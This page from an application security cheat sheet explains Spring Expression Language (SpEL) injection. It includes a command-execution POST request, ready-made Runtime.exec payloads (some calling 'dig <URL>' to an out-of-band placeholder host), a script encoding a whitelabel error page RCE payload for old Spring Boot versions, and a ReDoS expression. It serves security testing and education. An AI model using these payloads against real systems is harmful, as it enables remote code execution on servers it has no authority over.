💻
Application Security Cheat Sheet
  • Application Security Cheat Sheet
  • Android Application
    • Overview
      • Application Data & Files
      • Application Package
      • Application Sandbox
      • Application Signing
      • Deployment
      • Package Manager
    • Intent Vulnerabilities
      • Deep Linking Vulnerabilities
    • WebView Vulnerabilities
      • WebResourceResponse Vulnerabilities
      • WebSettings Vulnerabilities
  • CI/CD
    • Dependency
      • Dependency Confusion
      • Dependency Hijaking
      • Typosquatting
    • GitHub
      • GitHub Actions
      • Code owners
      • Dependabot
      • Redirect
      • Releases
  • Cloud
    • AWS
      • Amazon API Gateway
      • Amazon Cognito
      • Amazon S3
  • Container
    • Overview
      • Container Basics
      • Docker Engine
    • Escaping
      • CVE List
      • Exposed Docker Socket
      • Excessive Capabilities
      • Host Networking Driver
      • PID Namespace Sharing
      • Sensitive Mounts
    • Container Analysis Tools
  • Framework
    • Spring
      • Overview
      • Mass Assignment
      • Routing Abuse
      • SpEL Injection
      • Spring Boot Actuators
      • Spring Data Redis Insecure Deserialization
      • Spring View Manipulation
    • React
      • Overview
      • Security Issues
  • Linux
    • Overview
      • Philosophy
      • File
      • File Descriptor
      • I/O Redirection
      • Process
      • Inter Process Communication
      • Shell
      • Signals
      • Socket
      • User Space vs Kernel Space
    • Bash Tips
  • iOS Application
    • Overview
      • Application Data & Files
      • Application Package
      • Application Sandbox
      • Application Signing
      • Deployment
    • Getting Started
      • IPA Patching
      • Source Code Patching
      • Testing with Objection
  • Resources
    • Lists
      • Payloads
      • Wordlists
    • Researching
      • Web Application
      • Write-ups
    • Software
      • AWS Tools
      • Azure Tools
      • Component Analysis
      • Docker Analysis
      • Dynamic Analysis
      • Fuzzing
      • GCP Tools
      • Reverse Engineering
      • Static Analysis
      • Vulnerability Scanning
    • Training
      • Secure Development
  • Web Application
    • Abusing HTTP hop-by-hop Request Headers
    • Broken Authentication
      • Two-Factor Authentication Vulnerabilities
    • Command Injection
      • Argument Injection
    • Content Security Policy
    • Cookie Security
      • Cookie Bomb
      • Cookie Jar Overflow
      • Cookie Tossing
    • CORS Misconfiguration
    • File Upload Vulnerabilities
    • GraphQL Vulnerabilities
    • HTML Injection
      • base
      • iframe
      • link
      • meta
      • target attribute
    • HTTP Header Security
    • HTTP Request Smuggling
    • Improper Rate Limits
    • JavaScript Prototype Pollution
    • JSON Web Token Vulnerabilities
    • OAuth 2.0 Vulnerabilities
      • OpenID Connect Vulnerabilities
    • Race Condition
    • Server Side Request Forgery
      • Post Exploitation
    • SVG Abuse
    • Weak Random Generation
    • Web Cache Poisoning
Powered by GitBook
On this page
  • Spring Expression Language (SpEL) overview
  • Expression evaluation using Spring's expression interface
  • The EvaluationContext interface
  • Expression support for defining bean definitions
  • Language reference
  • SpEL Injection
  • Spring boot whitelabel error page RCE
  • SimpleEvaluationContext ReDoS
  • References
  1. Framework
  2. Spring

SpEL Injection

PreviousRouting AbuseNextSpring Boot Actuators

Last updated 3 years ago

Spring Expression Language (SpEL) overview

The Spring Expression Language (SpEL for short) is a powerful expression language that supports querying and manipulating an object graph at runtime.

Expression evaluation using Spring's expression interface

The following code introduces the SpEL API to evaluate the literal string expression Hello World!:

ExpressionParser parser = new SpelExpressionParser();
Expression exp = parser.parseExpression("'Hello World'.concat('!')");
String message = (String) exp.getValue();

The value of the message variable is simply Hello World!.

The EvaluationContext interface

StandardEvaluationContext standardContext = new StandardEvaluationContext();
EvaluationContext simpleContext = SimpleEvaluationContext.forReadOnlyDataBinding ().build();
Expression exp = parser.parseExpression("T(java.lang.Runtime).getRuntime().exec('id')");
// execute 'id' command (standard context is used by default)
exp.getValue();
// execute 'id' command
exp.getValue(standardContext);
// receive error message
exp.getValue(simpleContext);

Expression support for defining bean definitions

SpEL expressions can be used with XML or annotation based configuration metadata for defining BeanDefinitions. In both cases the syntax to define the expression is of the form #{ <expression string> }.

XML based configuration

You can set a property or constructor-arg value using expressions.

<bean id="numberGuess" class="org.spring.samples.NumberGuess">
    <property name="randomNumber" value="#{ T(java.lang.Math).random() * 100.0 }"/>
    <property name="defaultLocale" value="#{ systemProperties['user.region'] }"/>
    <!-- other properties -->
</bean>

Annotation-based configuration

The @Value annotation can be placed on fields, methods and method/constructor parameters to specify a default value.

public static class FieldValueTestBean {
  @Value("#{ systemProperties['user.region'] }")
  private String defaultLocale;

  public void setDefaultLocale(String defaultLocale)
  {
    this.defaultLocale = defaultLocale;
  }

  public String getDefaultLocale()
  {
    return this.defaultLocale;
  }
}

Language reference

SpEL Injection

SpEL injection occurs when user controlled data is passed directly to the SpEL expression parser. For instance, the following method uses the standard context to evaluate SpEL expression:

private static final SpelExpressionParser PARSER = new SpelExpressionParser();
private static final StandardEvaluationContext CONTEXT = new StandardEvaluationContext();

@PostMapping(path = "/")
public void method(@RequestBody String path, @RequestBody String value) {
    Expression expression = PARSER.parseExpression(path);
    expression.setValue(CONTEXT, value);
    // ...
}

As a result, you can gain code execution by sending the following POST request:

POST / HTTP/1.1
Host: vulnerable-website.com
...

{"path":"T(java.lang.Runtime).getRuntime().exec('touch executed').x", "value":"executed"}

If you have access to a source code, try to search for vulnerable code using the following keywords:

  • SpelExpressionParser, EvaluationContext, parseExpression, @Value("#{ <expression string> }")

  • #{ <expression string> }, ${<property>}, T(<javaclass>)

If a source code is not available, it is worth checking the metrics and beans endpoints provided by the Spring Boot actuators. These endpoints can expand the list of available beans and the parameters they accept.

Additionally, try to use expressions in different elements of the service:

  • Parameter names and values:

    • variable[<expression string>]=123

    • variable=123&<expression string>=123

    • {"<expression string>":"123"}

    • {"variable":"<expression string>"}

  • HTTP headers:

    • Cookie: cookie_name=<expression string>

    • Cookie: <expression string>=cookie_value

    • Private-Token: <expression string>

  • etc.

You can use the following payloads as the expression string:

${1+3}
T(java.lang.Runtime).getRuntime().exec("dig <URL>")
#this.getClass().forName('java.lang.Runtime').getRuntime().exec('dig <URL>')
new java.lang.ProcessBuilder({'dig <URL>'}).start()
${user.name}

Spring boot whitelabel error page RCE

This vulnerability requires the following conditions:

  • Spring Boot version 1.1.0 - 1.1.12, 1.2.0 - 1.2.7, 1.3.0

  • There is at least one interface that triggers the default whitelabel error page in Spring Boot

  1. Spring Boot processes URL parameters in errors with the org.springframework.util.PropertyPlaceholderHelper class

  2. PropertyPlaceholderHelper.parseStringValue method parses URL parameters

  3. Content enclosed in ${} will be parsed and executed as a SpEL expression by the resolvePlaceholder method of org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration class

As a result, it leads to RCE and you can execute arbitrary commands using the following steps:

  1. Prepare the payload with the next python scrypt (this sample prepares a payload that executes open -a Calculator command):

    cmd = 'open -a Calculator'
    
    h = ''
    for x in cmd:
        h += hex(ord(x)) + ','
    
    payload = h.rstrip(',')
    
    print('${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{' + payload + '}))}')
  2. Send the payload within the id parameter:

    /article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}
  3. open -a Calculator will be executed

References:

SimpleEvaluationContext ReDoS

The SimpleEvaluationContext context prevents arbitrary code executing and writes a error message. However, you still can exploit the ReDoS attack.

EvaluationContext simpleContext = SimpleEvaluationContext.forReadOnlyDataBinding ().build();
Expression exp = parser.parseExpression("'aaaaaaaaaaaaaaaaaaaaaaaa!'.matches('^(a+)+$')");
// ReDoS
exp.getValue(simpleContext);

References

The interface is used when evaluating an expression to resolve properties, methods, fields, and to help perform type conversion. There are two main out-of-the-box implementations:

. A powerful and highly configurable EvaluationContext implementation. This context uses standard implementations of all applicable strategies, based on reflection to resolve properties, methods and fields.

. A basic implementation of EvaluationContext that focuses on a subset of essential SpEL features and customization options, targeting simple condition evaluation and in particular data binding scenarios.

Check the next Spring Boot application: . If you send a request to /article?id=hop, the application will return a whitelabel error with code 500. However, if you send a request to /article?id=${7*7}, the application returns an error page with the calculated value 49. It happens because:

EvaluationContext
StandardEvaluationContext
SimpleEvaluationContext
LandGrey/springboot-spel-rce
Spring Boot Vulnerability Exploit Check List: whitelabel error page SpEL RCE
Spring Framework Docs: Spring Expression Language (SpEL)
SpEL Injection (Russia)
Logo8. Spring Expression Language (SpEL)
Logo8. Spring Expression Language (SpEL)
LogoSpring Boot Actuatorscheat-sheets